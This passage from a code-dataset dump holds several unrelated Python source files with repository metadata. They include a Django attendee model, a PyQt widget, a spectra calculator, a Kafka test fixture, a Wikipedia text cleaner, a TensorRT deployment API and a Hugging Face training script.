Type: \",\n type(birthday),\n \" exception: \",\n e,\n )\n return None\n\n def __str__(self):\n return self.display_label\n\n def clean(self):\n if not (\n self.last_name or self.last_name2 or self.first_name or self.first_name2\n ):\n raise ValidationError(\"You must specify at least a name\")\n\n def get_absolute_url(self):\n return reverse(\"/persons/attendee_detail_view/\", kwargs={\"pk\": self.pk})\n\n class Meta:\n db_table = \"persons_attendees\"\n ordering = [\"last_name\", \"first_name\"]\n indexes = [\n GinIndex(\n fields=[\"infos\"],\n name=\"attendee_infos_gin\",\n ),\n # GinIndex(fields=['progressions'], name='attendee_progressions_gin', ),\n ]\n\n def name1(self):\n return f\"{self.first_name or ''} {self.last_name or ''}\".strip()\n\n def name2(self):\n return f\"{self.last_name2 or ''}{self.first_name2 or ''}\".strip()\n\n def save(self, *args, **kwargs):\n self.estimated_birthday = Utility.presence(self.estimated_birthday)\n name = self.name1()\n name2 = self.name2()\n both_names = f\"{name} {name2}\".strip()\n self.infos[\"names\"][\"original\"] = both_names\n self.infos[\"names\"][\"romanization\"] = unidecode(\n both_names\n ).strip() # remove accents & get phonetic\n if self.division.organization.infos.get(\"settings\", {}).get(\n \"opencc_convert\"\n ): # Let search work in either language\n s2t_converter = opencc.OpenCC(\"s2t.json\")\n t2s_converter = opencc.OpenCC(\"t2s.json\")\n self.infos[\"names\"][\"traditional\"] = s2t_converter.convert(both_names)\n self.infos[\"names\"][\"simplified\"] = t2s_converter.convert(both_names)\n super(Attendee, self).save(*args, **kwargs)\n\n def all_names(self):\n return [\n self.first_name,\n self.last_name,\n self.last_name2,\n self.first_name2,\n ] + list(self.infos[\"names\"].values())\n\n # class ReadonlyMeta:\n # readonly = [\"full_name\"] # generated column\n\n\n# class TestModel(models.Model):\n# ...\n# @pghistory.track(\n# pghistory.Snapshot('attendee.snapshot')\n# )\n\n\nclass AttendeesHistory(pghistory.get_event_model(\n Attendee,\n pghistory.Snapshot('attendee.snapshot'),\n pghistory.BeforeDelete('attendee.before_delete'),\n name='AttendeesHistory',\n related_name='history',\n)):\n pgh_id = models.BigAutoField(primary_key=True, serialize=False)\n pgh_created_at = models.DateTimeField(auto_now_add=True)\n created = model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')\n modified = model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')\n is_removed = models.BooleanField(default=False)\n pgh_obj = models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='history', to='persons.attendee')\n id = models.UUIDField(db_index=True, default=uuid4, editable=False, serialize=False)\n division = models.ForeignKey(db_constraint=False, default=0, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='+', to='whereabouts.division')\n gender = models.CharField(choices=GenderEnum.choices(), default=GenderEnum['UNSPECIFIED'], max_length=11)\n pgh_label = models.TextField(help_text='The event label.')\n user = models.ForeignKey(blank=True, db_constraint=False, default=None, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='+', to=settings.AUTH_USER_MODEL)\n pgh_context = models.ForeignKey(db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', 
to='pghistory.context')\n infos = models.JSONField(blank=True, default=Utility.attendee_infos, help_text='Example: {\"fixed\": {\"food_pref\": \"peanut allergy\", \"nick_name\": \"John\"}}.Please keep {} here even no data', null=True)\n first_name = models.CharField(blank=True, max_length=25, null=True)\n last_name = models.CharField(blank=True, max_length=25, null=True)\n first_name2 = models.CharField(blank=True, max_length=12, null=True)\n last_name2 = models.CharField(blank=True, max_length=8, null=True)\n photo = PrivateFileField(blank=True, null=True, storage=PrivateFileSystemStorage(), upload_to='attendee_portrait', verbose_name='Photo')\n actual_birthday = models.DateField(blank=True, null=True)\n estimated_birthday = partial_date.fields.PartialDateField(blank=True, help_text='1998, 1998-12 or 1992-12-31, please enter 1800 if year not known', null=True)\n deathday = models.DateField(blank=True, null=True)\n\n class Meta:\n db_table = \"persons_attendeeshistory\"\n","repo_name":"xjlin0/attendees32","sub_path":"attendees/persons/models/attendee.py","file_name":"attendee.py","file_ext":"py","file_size_in_byte":15959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"40858984795","text":"import sys\nfrom PyQt5.QtWidgets import QApplication ,QWidget,QPushButton\n\n# Simple Custom widget with a Button\nclass MyWidget(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 300, 300)\n self.setWindowTitle(\"My Widget\")\n\n # Setting the basic size and parameters of the button\n button = QPushButton(\"Start\",self)\n button.resize(100,30)\n button.move((self.width()/2 - button.width()/2)\n ,self.height()/2 - button.height()/2)\n\n #Button onClicked 'Signal' connected to our 'Slot'\n button.clicked.connect(self.clickMethod)\n\n #Set default size of the Widget\n self.show()\n\n def clickMethod(self):\n print(\"Start Button is clicked\")\n\nif __name__ == \"__main__\":\n\n app = QApplication(sys.argv)\n\n widget = MyWidget()\n sys.exit(app.exec())","repo_name":"njanirudh/PythonQt","sub_path":"SimpleSnippets/button_basic_1.py","file_name":"button_basic_1.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40398680156","text":"# calculates spectra of a given star at different inclinations\nfrom pa.lib import limbdark\nfrom pa.lib import fit as ft\nfrom pa.lib import star\nfrom pa.lib import util as ut\nimport numpy as np\nfrom numpy.core import defchararray as ch\nimport sys\nimport time\nimport argparse\nimport pickle\nimport os\n\ndef run():\n\tparser = argparse.ArgumentParser(description=\"Examples: \\n\" +\\\n\t\t\"calc_spectra data/vega.pkl data/vega/ -i 0.000 1.5707963267948966 150; \" +\\\n\t\t\"calc_spectra data/vega.pkl data/vega/ -i 0.088418; \" +\\\n\t\t\"calc_spectra data/altair.pkl data/altair/ -i 0.8840; \" +\\\n\t\t\"calc_spectra data/achernar.pkl data/achernar/ -i 1.0577\")\n\tparser.add_argument(\"pkl_sfile\", help=\"the pickled star file\")\n\tparser.add_argument(\"output\", help=\"the output directory\")\n\tparser.add_argument('-i', type=float, nargs='+', help='either a single inclination in radians ' +\n\t\t'or a equally spaced values specified by minimum, maximum and number', required=True)\n\tparser.add_argument(\"-m\", help=\"longitudinal integration method: 0=cubic(default), 1=trapezoidal\", type=int, \\\n\t\t\tdefault=0)\n\targs = 
parser.parse_args()\n\n\t## inputs\n\tpkl_sfile = args.pkl_sfile # pickled star file\n\toutput = args.output # output location\n\t\n\t# integration method\n\tif args.m == 0: \n\t\tm = 'cubic'\n\telif args.m == 1:\n\t\tm = 'trapezoid'\n\telse:\n\t\tsys.exit(\"Longitudinal integration method should be either 0 (cubic) or 1 (trapezoidal).\")\n\n\t# inclinations\n\ti = args.i \n\tli = len(i)\n\tif li not in [1, 3]:\n\t\tsys.exit(\"Please specify either a single inclination in radians (one number) \" +\\\n\t\t\t\"or a range specified by minimum, maximum and step (three numbers).\")\n\telif li == 1:\n\t\tinclinations = np.array( i )\n\t\t# decimal precision of inclination for printout\n\t\tprec = 6\n\telif li == 3:\n\t\tmi, ma, num = i\n\t\tinclinations = np.linspace( mi, ma, num=int(num) )\n\t\t# decimal precision of inclination for printout\n\t\tprec = np.int( np.ceil( -np.log10( (ma - mi) / num ) ) )\n\tleni = len(inclinations)\n\t\n\t# unpickle the star\n\twith open(pkl_sfile, 'rb') as f:\n\t\tst = pickle.load(f)\n\t# get the wavelengths at which we see light from this star\n\twl = st.wavelengths\n\n\t## write the spectra of the star in text format\n\t# create the directory if it doesn't exist\n\tif not os.path.exists(output):\n\t\tos.mkdir(output)\n\t# filenames\n\tif not output.endswith('/'):\n\t\toutput += '/'\n\tfilename = os.path.splitext(os.path.basename(pkl_sfile))[0]\n\tinc_str = np.array([(\"%.\" + str(prec) + \"f\") % x for x in np.round(inclinations, decimals=prec)])\n\tofiles = ch.add(output + filename + '_', ch.replace(inc_str, '.', '_'))\n\tofiles = ch.add(ofiles, '.txt')\n\n\tfor i, ofile in np.ndenumerate(ofiles):\n\t\t# message\n\t\tif i[0] % 10 == 0:\t\t\n\t\t\tprint(str(i[0]) + \" out of \" + str(leni) + \" inclinations calculated.\") \n\t\t\tsys.stdout.flush()\n\t\t# current inclination\n\t\tinc = inclinations[i] \n\t\t# calculate the spectrum or the magnitudes\n\t\tlight = st.integrate(inc, method=m)\n\n\t\t# create this file if it doesn't exist, open it for writing\n\t\tf = open(ofile,'w+') \n\t\t# write the header\n\t\tf.write('# luminosity: ' + str(st.luminosity) + '\\n')\n\t\tf.write('# omega: ' + str(st.surface.omega) + '\\n')\n\t\tf.write('# inclination(rad): ' + str(inclinations[i]) + '\\n')\n\t\tf.write('# mass: ' + str(st.mass) + '\\n')\n\t\tf.write('# Req: ' + str(st.Req) + '\\n')\n\t\tf.write('# distance: ' + format(st.distance, '.2e') + ' cm\\n')\n\t\tf.write('# A_V: ' + format(*(st.a_v), '.2f') + '\\n')\n\t\tf.write('# number of upper half z values: ' + str(st.map.nz) + '\\n')\n\t\t# write the spectrum to the file\n\t\tf.write('\\n')\n\t\tif st.bands is None: # spectrum mode\n\t\t\tf.write('# wavelength(nm)\\tflux(ergs/s/Hz/ster)\\n') \n\t\t\tfor j, w in np.ndenumerate(wl):\n\t\t\t\tf.write( str(w) )\n\t\t\t\tf.write('\\t %.5E' % light[j])\n\t\t\t\tf.write('\\n')\n\t\telse: # photometry mode\n\t\t\tf.write('# filter\\twavelength(nm)\\tmagnitude\\n') \n\t\t\tfor j, w in enumerate(wl):\n\t\t\t\tf.write( st.bands[j] )\n\t\t\t\tf.write('\\t %.6g' % w )\n\t\t\t\tf.write('\\t %.8f' % light[j])\n\t\t\t\tf.write('\\n')\n\t\tf.close()\n\t\t\n# in case we are running this file as the main program\nif __name__ == \"__main__\":\n\trun()","repo_name":"mlipatov/paint_atmospheres","sub_path":"pa/calc_spectra.py","file_name":"calc_spectra.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"5117541219","text":"import base64\nimport logging\nimport os\n\nimport 
pytest\nimport sdk_install\nimport sdk_security\nimport sdk_utils\nimport spark_s3 as s3\n\nLOGGER = logging.getLogger(__name__)\n\nPRODUCER_SERVICE_NAME = \"Spark->Kafka Producer\"\n\nDEFAULT_KAFKA_TASK_COUNT = 3\nKERBERIZED_KAFKA = True\nKAFKA_KRB5_ORIG = b'''[libdefaults]\ndefault_realm = LOCAL\n\n[realms]\n LOCAL = {\n kdc = kdc.marathon.autoip.dcos.thisdcos.directory:2500\n }\n'''\nKAFKA_KRB5 = base64.b64encode(KAFKA_KRB5_ORIG).decode('utf8')\nKAFKA_PACKAGE_NAME = os.getenv(\"KAFKA_PACKAGE_NAME\", \"kafka\")\nKAFKA_SERVICE_NAME = os.getenv(\"KAFKA_SERVICE_NAME\", (\"secure-kafka\" if KERBERIZED_KAFKA else \"kafka\"))\nKAFKA_SERVICE_ACCOUNT = \"{}-service-acct\".format(KAFKA_SERVICE_NAME)\nKAFKA_SERVICE_ACCOUNT_SECRET = \"{}-secret\".format(KAFKA_SERVICE_NAME)\nTHIS_DIR = os.path.dirname(os.path.abspath(__file__))\n\nKEYTAB_SECRET = \"__dcos_base64___keytab\"\n\n\ndef upload_jaas():\n jaas_path = os.path.join(THIS_DIR, \"..\", \"resources\", \"spark-kafka-client-jaas.conf\")\n s3.upload_file(jaas_path)\n return s3.http_url(\"spark-kafka-client-jaas.conf\")\n\n\ndef get_kerberized_kafka_spark_conf(spark_service_name, keytab_secret=KEYTAB_SECRET):\n return [\n \"--conf\", \"spark.mesos.driver.secret.names={}\".format(keytab_secret),\n \"--conf\", \"spark.mesos.driver.secret.filenames=kafka-client.keytab\",\n \"--conf\", \"spark.mesos.executor.secret.names={}\".format(keytab_secret),\n \"--conf\", \"spark.mesos.executor.secret.filenames=kafka-client.keytab\",\n \"--conf\", \"spark.mesos.task.labels=DCOS_SPACE:/{}\".format(spark_service_name),\n \"--conf\", \"spark.executorEnv.KRB5_CONFIG_BASE64={}\".format(KAFKA_KRB5),\n \"--conf\", \"spark.mesos.driverEnv.KRB5_CONFIG_BASE64={}\".format(KAFKA_KRB5),\n \"--conf\", \"spark.driver.extraJavaOptions=-Djava.security.auth.login.config=\"\n \"/mnt/mesos/sandbox/spark-kafka-client-jaas.conf\",\n \"--conf\", \"spark.executor.extraJavaOptions=\"\n \"-Djava.security.auth.login.config=/mnt/mesos/sandbox/spark-kafka-client-jaas.conf\",\n ]\n\n\n@pytest.fixture(scope='package')\ndef configure_security_kafka():\n yield from sdk_security.security_session(framework_name=KAFKA_SERVICE_NAME,\n service_account=KAFKA_SERVICE_ACCOUNT,\n secret=KAFKA_SERVICE_ACCOUNT_SECRET)\n\n\n@pytest.fixture(scope='package')\ndef kerberized_kafka(configure_security_kafka, kerberos_options):\n try:\n additional_options = {\n \"service\": {\n \"name\": KAFKA_SERVICE_NAME,\n \"security\": kerberos_options\n },\n \"kafka\": {\n \"default_replication_factor\": 3,\n \"num_partitions\": 32\n }\n }\n\n if sdk_utils.is_strict_mode():\n additional_options[\"service\"][\"service_account\"] = KAFKA_SERVICE_ACCOUNT\n additional_options[\"service\"][\"principal\"] = KAFKA_SERVICE_ACCOUNT\n additional_options[\"service\"][\"service_account_secret\"] = KAFKA_SERVICE_ACCOUNT_SECRET\n additional_options[\"service\"][\"secret_name\"] = KAFKA_SERVICE_ACCOUNT_SECRET\n\n sdk_install.uninstall(KAFKA_PACKAGE_NAME, KAFKA_SERVICE_NAME)\n sdk_install.install(\n KAFKA_PACKAGE_NAME,\n KAFKA_SERVICE_NAME,\n DEFAULT_KAFKA_TASK_COUNT,\n additional_options=additional_options,\n timeout_seconds=30 * 60)\n\n yield\n\n finally:\n sdk_install.uninstall(KAFKA_PACKAGE_NAME, KAFKA_SERVICE_NAME)\n","repo_name":"mesosphere/spark-build","sub_path":"tests/integration/fixture_kafka.py","file_name":"fixture_kafka.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"7"} +{"seq_id":"4793113855","text":"import os\nfrom hanziconv import 
HanziConv\nimport re\n\n\ndef get_path(root_path):\n    ALL = []\n    for root, dirs, files in os.walk(root_path):\n        # print(root)  # current directory path\n        # print(dirs)  # all subdirectories under the current path\n        # print(files)  # all non-directory files under the current path\n        for file in files:\n            ALL.append(os.path.join(root, file))\n    return ALL\n\n\ndef qu_kong(list):\n    return [l for l in list if l != []]\n\n\ndef get_text_from_html(html_path):\n    with open(html_path, 'r', encoding='utf-8') as f:\n        t = f.read()\n    t = t.split('</doc>')  # first split the document into its individual articles\n\n    for ele in t:\n        k = re.findall('title=\"(.*)\"', ele)  # read each article's title\n        try:\n            if k != []:\n                f = ele.split('title=\"%s\">\\n' % (k[0]))  # split each article's content on its title\n                want = f[1].strip()  # get the body text of the article\n                want = re.sub('\\n+', ' ', want)  # turn newlines in the body into spaces, so each line represents one article\n                want = ' '.join(re.findall('[\\w|\\d]+', want))  # strip punctuation and special characters\n                # print(want)\n                want = HanziConv.toSimplified(want)  # convert traditional to simplified Chinese\n                with open('text', 'a', encoding='utf-8') as o:\n                    o.write(want)\n                    o.write('\\n')\n        except Exception as e:\n            print(html_path)\n            print(ele)\n            print(k)\n            continue\n\n\nif __name__ == '__main__':\n    root_path = 'G:\\AI_FOR_NLP\\wikiextractor\\wiki'\n    all_path = qu_kong(get_path(root_path))\n    for path in all_path:\n        get_text_from_html(path)\n\n    with open('text', 'r', encoding='utf-8') as f:\n        texts = [line.strip() for line in f]\n\n    twentyth_of_size = len(texts) // 20\n    twentyth_text = texts[:twentyth_of_size]  # take 5% of the articles\n    with open('twentyth_text', 'a', encoding='utf-8') as o:\n        # save the 5% sample, with each article written as one space-separated string\n        for line in twentyth_text:\n            line = line.strip()\n            o.write(line + ' ')\n","repo_name":"hc1121/AI-For-NLP-Course","sub_path":"lesson_02/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1567817215","text":"import tensorrt\nimport os\nimport torch\nimport json\nfrom typing import Union\nimport numpy as np\nfrom SpecialTopic.Deploy.RemainEatingTimeRegression.RemainEatingTimeRegression import RemainEatingTimeRegressionNet, \\\n    load_pretrained, get_mock_data, simplify_onnx, parser_setting\nfrom SpecialTopic.Deploy.OnnxToTensorRT.TensorrtBase import TensorrtBase\n\n\ndef create_onnx_file(model_phi='stander', setting='./prepare/setting_0.json', pretrained='./prepare/regression_0.pth',\n                     with_simplify=True, input_name='food_remain', output_name='time_remain',\n                     onnx_file_name='RemainEatingTimeRegression.onnx',\n                     simplify_file_name='RemainEatingTimeRegression_Simplify.onnx'):\n    \"\"\" Create the onnx file and, if needed, also create the simplified onnx file\n    Args:\n        model_phi: model size\n        setting: model setting data, generated together with the training data\n        pretrained: path to the trained weights\n        with_simplify: whether to run the onnx simplification step\n        input_name: name of the input, used by the later steps\n        output_name: name of the output, used by the later steps\n        onnx_file_name: name of the onnx file exported from pytorch\n        simplify_file_name: name of the simplified onnx file; not needed if simplification is skipped\n    \"\"\"\n    support_model_phi = {\n        'stander': {'input_size': 32, 'hidden_size': 64, 'num_layers': 2}\n    }\n    model_cfg = support_model_phi.get(model_phi, None)\n    assert model_cfg is not None, f'The specified model size {model_phi} is not supported; add it yourself if needed'\n    settings = parser_setting(setting)\n    model_cfg['remain_time_classes'] = settings['remain_time_padding_value'] + 1\n    model = RemainEatingTimeRegressionNet(**model_cfg)\n    model = load_pretrained(model, pretrained_path=pretrained)\n    mock_food_remain = get_mock_data(settings)\n    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n    model = model.to(device)\n    mock_food_remain = mock_food_remain.to(device)\n    input_names = [input_name]\n    output_names = [output_name]\n    with torch.no_grad():\n        torch.onnx.export(model, mock_food_remain, onnx_file_name, input_names=input_names,\n                          output_names=output_names, opset_version=11)\n    if with_simplify:\n        simplify_onnx(onnx_path=onnx_file_name, output_path=simplify_file_name)\n
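\n\n# A small parity check between the pytorch model and the exported onnx file can catch export problems early.\n# The helper below is an illustrative sketch rather than part of the original API; it assumes onnxruntime is\n# installed and reuses the default names from create_onnx_file above.\ndef check_onnx_parity(model, sample, onnx_file='RemainEatingTimeRegression_Simplify.onnx',\n                      input_name='food_remain', output_name='time_remain', atol=1e-4):\n    import onnxruntime\n    session = onnxruntime.InferenceSession(onnx_file)\n    # onnxruntime consumes numpy inputs; sample is the int64 tensor produced by get_mock_data\n    onnx_out = session.run([output_name], {input_name: sample.cpu().numpy()})[0]\n    with torch.no_grad():\n        torch_out = model(sample).cpu().numpy()\n    return np.allclose(onnx_out, torch_out, atol=atol)\n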
\n\ndef create_onnx_session(onnx_file='RemainEatingTimeRegression_Simplify.onnx', gpu='auto'):\n    \"\"\" Create a session object that can run the onnx model\n    Args:\n        onnx_file: the onnx file to load\n        gpu: when set to auto, automatically detect whether gpu mode is available\n    \"\"\"\n    try:\n        import onnxruntime\n    except ImportError:\n        raise ImportError('onnxruntime must be installed to run inference with onnxruntime')\n    assert os.path.exists(onnx_file), 'The given onnx file path does not exist'\n    if gpu == 'auto':\n        gpu = True if onnxruntime.get_device() == 'GPU' else False\n    if not gpu:\n        session = onnxruntime.InferenceSession(onnx_file)\n    else:\n        session = onnxruntime.InferenceSession(onnx_file, providers=['CUDAExecutionProvider'])\n    return session\n\n\ndef transform_food_remain_to_model_input(food_remain, settings):\n    \"\"\"\n    Args:\n        food_remain: the remaining food amounts\n        settings: the model settings; a dict is required here so the settings file is not re-read on every call\n    \"\"\"\n    assert isinstance(settings, dict), 'settings passed to transform_food_remain_to_model_input must be a dict, ' \\\n                                       'to avoid re-reading the settings file every time'\n    max_length = settings.get('max_length', None)\n    remain_start_value = settings.get('remain_start_value', None)\n    remain_end_value = settings.get('remain_end_value', None)\n    remain_padding_value = settings.get('remain_padding_value', None)\n    assert max_length is not None and remain_start_value is not None and remain_end_value is not None and \\\n        remain_padding_value is not None, 'The given settings are invalid'\n    food_remain = np.array(food_remain)\n    food_remain = np.append(np.array([remain_start_value]), food_remain)\n    food_remain = np.append(food_remain, np.array([remain_end_value]))\n    food_remain = np.append(food_remain, np.array([remain_padding_value] * max_length))[:max_length]\n    food_remain = np.expand_dims(food_remain, axis=0)\n    return food_remain\n\n\ndef onnxruntime_detection_image(onnx_model, food_remain, settings: Union[str, dict], input_name='food_remain',\n                                output_name='time_remain'):\n    \"\"\" Run inference with onnxruntime\n    Args:\n        onnx_model: the onnxruntime model\n        food_remain: the remaining food amounts\n        settings: the model training parameters, either a dict or a file path\n        input_name: input name for onnx, must match the name used when generating the onnx file\n        output_name: output name from onnx, must match the name used when generating the onnx file\n    \"\"\"\n    if isinstance(settings, str):\n        settings = parser_setting(settings)\n    food_remain = transform_food_remain_to_model_input(food_remain, settings)\n    food_remain = food_remain.astype(np.longlong)\n    onnx_inputs = {input_name: food_remain}\n    onnx_outputs = [output_name]\n    onnx_preds = onnx_model.run(onnx_outputs, onnx_inputs)[0]\n    onnx_preds = np.transpose(onnx_preds, (0, 2, 1))\n    prediction = onnx_preds.argmax(axis=1).flatten()\n    return prediction\n\n\ndef create_tensorrt_engine(onnx_file_path='RemainEatingTimeRegression_Simplify.onnx', fp16_mode=True, max_batch_size=1,\n                           trt_engine_path=None, save_trt_engine_path=None, dynamic_shapes=None,\n                           trt_logger_level='VERBOSE'):\n    tensorrt_engine = TensorrtBase(onnx_file_path=onnx_file_path, fp16_mode=fp16_mode, max_batch_size=max_batch_size,\n                                   dynamic_shapes=dynamic_shapes, save_trt_engine_path=save_trt_engine_path,\n                                   trt_engine_path=trt_engine_path, trt_logger_level=trt_logger_level)\n    return tensorrt_engine\n
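\n\n# For reference, a worked example of the input transform above (illustrative numbers, not from a real settings\n# file): with max_length=6, remain_start_value=101, remain_end_value=102 and remain_padding_value=103, the raw\n# sequence [100, 97, 95] becomes [[101, 100, 97, 95, 102, 103]] -- start token, values, end token, padding,\n# truncated to max_length, with a leading batch dimension added by expand_dims.\n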
\n\ndef tensorrt_engine_detect_remain_time(tensorrt_engine, food_remain, settings: Union[str, dict],\n                                       input_name='food_remain', output_shapes='time_remain'):\n    \"\"\" Run inference with tensorrt\n    Args:\n        tensorrt_engine: the instantiated tensorrt inference engine\n        food_remain: the remaining food amounts\n        settings: the model setting parameters\n        input_name: input name for onnx, must match the name used when generating the onnx file\n        output_shapes: output name from onnx, which must match the name used when generating the onnx file, or an\n            explicit shape (using the name is recommended here, it is simpler and easier to understand)\n    Returns:\n        the inference result\n    \"\"\"\n    if isinstance(settings, str):\n        settings = parser_setting(settings)\n    food_remain = transform_food_remain_to_model_input(food_remain, settings)\n    food_remain = food_remain.astype(np.longlong)\n    tensorrt_inputs = {input_name: np.ascontiguousarray(food_remain)}\n    tensorrt_preds = tensorrt_engine.inference(input_datas=tensorrt_inputs, output_shapes=[output_shapes])[0]\n    tensorrt_preds = np.transpose(tensorrt_preds, (0, 2, 1))\n    prediction = tensorrt_preds.argmax(axis=1).flatten()\n    return prediction\n\n\nif __name__ == '__main__':\n    # create_onnx_file()\n    # session = create_onnx_session()\n    setting_path = './prepare/setting_0.json'\n    remain = [100, 99, 98, 97, 96, 94, 93, 92, 92, 90, 90, 90, 89, 89, 89, 88, 88, 87, 87, 83, 82, 82, 82, 80, 79, 78,\n              76, 76, 76, 75, 75, 74, 74, 72, 72, 69, 68, 67, 66, 66, 65, 64, 64, 62, 62, 60, 60, 59, 56, 55, 55, 55,\n              54, 54, 52, 51, 50, 47, 46, 43, 43, 42, 41, 40, 40, 39, 38, 38, 36, 35, 34, 34, 34, 33, 32, 32, 31, 30,\n              29, 26, 24, 23, 23, 23, 23, 21, 16, 16, 15, 14, 13, 11, 11, 9, 9, 7, 7, 6, 5]\n    # prediction = onnxruntime_detection_image(session, remain, settings=setting_path)\n    # print(prediction)\n    tensorrt_engine = create_tensorrt_engine(trt_engine_path='RemainEatingTimeRegression_Simplify.trt')\n    prediction = tensorrt_engine_detect_remain_time(tensorrt_engine, remain, settings=setting_path)\n    print(prediction)\n","repo_name":"chris901003/DeepLearning","sub_path":"SpecialTopic/Deploy/RemainEatingTimeRegression/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8189,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"34434374494","text":"def main():\n    import wx\n    from Prog.Window import WindowFrame\n    app = wx.App(False)\n    frame = WindowFrame()\n    frame.Show()\n    app.MainLoop()\n\ndef main2():\n    from Prog.AutoFight import AutoFight\n    A = AutoFight()\n    A.AutoFight(1000)\n\ndef main3():\n\timport numpy as np\n\tfrom Prog.Binary import ReadTrainingDatasFromDirectory\n\tfrom Prog.Engine.kerasDQN_ai import kerasDQNPlayer\n\n\tAI = kerasDQNPlayer(1)\n\tdir_path=(\"./bin/\")\n\tTrainingData=ReadTrainingDatasFromDirectory(dir_path)\n\ttrain_x, val_x = np.split(TrainingData[0], [int(len(TrainingData[0])/10*9)])\n\ttrain_y1, val_y1 = np.split(TrainingData[1], [int(len(TrainingData[1])/10*9)])\n\ttrain_y2, val_y2 = np.split(TrainingData[2], [int(len(TrainingData[2])/10*9)])\n\tAI.learn(train_x, train_y1, train_y2, val_x, val_y1, val_y2)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"KCCTdensan/ProCon2018-Solver","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11518780883","text":"import copy\nimport logging\nfrom dataclasses import dataclass, field\nfrom typing import Optional, Dict, Sequence\n\nimport transformers\nfrom transformers import (\n    Trainer, \n    default_data_collator, \n    set_seed,\n)\n\nfrom dataset_utils import (\n    make_raw_dataset,\n    make_tokenized_dataset, \n    make_grouped_dataset, \n    make_train_eval_dataset,\n    preprocess_logits_for_metrics,\n    compute_metrics,\n    get_resume_checkpoint_or_None\n)\n\nfrom args import (\n    ModelArguments,\n    DataTrainingArguments,\n    TrainingArguments\n)\n\nDEFAULT_PAD_TOKEN = \"[PAD]\"\nDEFAULT_EOS_TOKEN = \"</s>\"\nDEFAULT_BOS_TOKEN = \"<s>\"\nDEFAULT_UNK_TOKEN = \"<unk>\"\n\ndef safe_save_model_for_hf_trainer(trainer: 
transformers.Trainer, output_dir: str):\n \"\"\"Collects the state dict and dump to disk.\"\"\"\n state_dict = trainer.model.state_dict()\n if trainer.args.should_save:\n cpu_state_dict = {key: value.cpu() for key, value in state_dict.items()}\n del state_dict\n trainer._save(output_dir, state_dict=cpu_state_dict) # noqa\n\n\ndef smart_tokenizer_and_embedding_resize(\n special_tokens_dict: Dict,\n tokenizer: transformers.PreTrainedTokenizer,\n model: transformers.PreTrainedModel,\n):\n \"\"\"Resize tokenizer and embedding.\n Note: This is the unoptimized version that may make your embedding size not be divisible by 64.\n \"\"\"\n num_new_tokens = tokenizer.add_special_tokens(special_tokens_dict)\n model.resize_token_embeddings(len(tokenizer))\n\n if num_new_tokens > 0:\n input_embeddings = model.get_input_embeddings().weight.data\n output_embeddings = model.get_output_embeddings().weight.data\n\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\n\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\n\n\ndef train():\n parser = transformers.HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))\n model_args, data_args, training_args = parser.parse_args_into_dataclasses()\n\n # Set seed before initializing model.\n set_seed(training_args.seed)\n\n model = transformers.AutoModelForCausalLM.from_pretrained(\n model_args.model_name_or_path,\n cache_dir=training_args.cache_dir,\n )\n\n tokenizer = transformers.AutoTokenizer.from_pretrained(\n model_args.model_name_or_path,\n cache_dir=training_args.cache_dir,\n model_max_length=training_args.model_max_length,\n padding_side=\"right\",\n use_fast=False,\n )\n if tokenizer.pad_token is None:\n smart_tokenizer_and_embedding_resize(\n special_tokens_dict=dict(pad_token=DEFAULT_PAD_TOKEN),\n tokenizer=tokenizer,\n model=model,\n )\n if \"llama\" in model_args.model_name_or_path:\n tokenizer.add_special_tokens(\n {\n \"eos_token\": DEFAULT_EOS_TOKEN,\n \"bos_token\": DEFAULT_BOS_TOKEN,\n \"unk_token\": DEFAULT_UNK_TOKEN,\n }\n )\n \n\n raw_datasets = make_raw_dataset(data_args=data_args, cache_dir=training_args.cache_dir)\n tokenized_datasets = make_tokenized_dataset(tokenizer, raw_datasets, training_args=training_args, data_args=data_args)\n lm_datasets = make_grouped_dataset(tokenizer, tokenized_datasets, data_args=data_args, training_args=training_args)\n\n train_dataset, eval_dataset = make_train_eval_dataset(lm_datasets, data_args, training_args)\n\n trainer = Trainer(\n model=model,\n tokenizer=tokenizer, \n args=training_args,\n train_dataset=train_dataset,\n eval_dataset=eval_dataset,\n data_collator=default_data_collator, \n compute_metrics=compute_metrics,\n preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval else None,\n )\n checkpoint = get_resume_checkpoint_or_None(training_args)\n trainer.train(resume_from_checkpoint=checkpoint)\n trainer.save_state()\n \n safe_save_model_for_hf_trainer(trainer=trainer, output_dir=training_args.output_dir)\n\n\nif __name__ == \"__main__\":\n 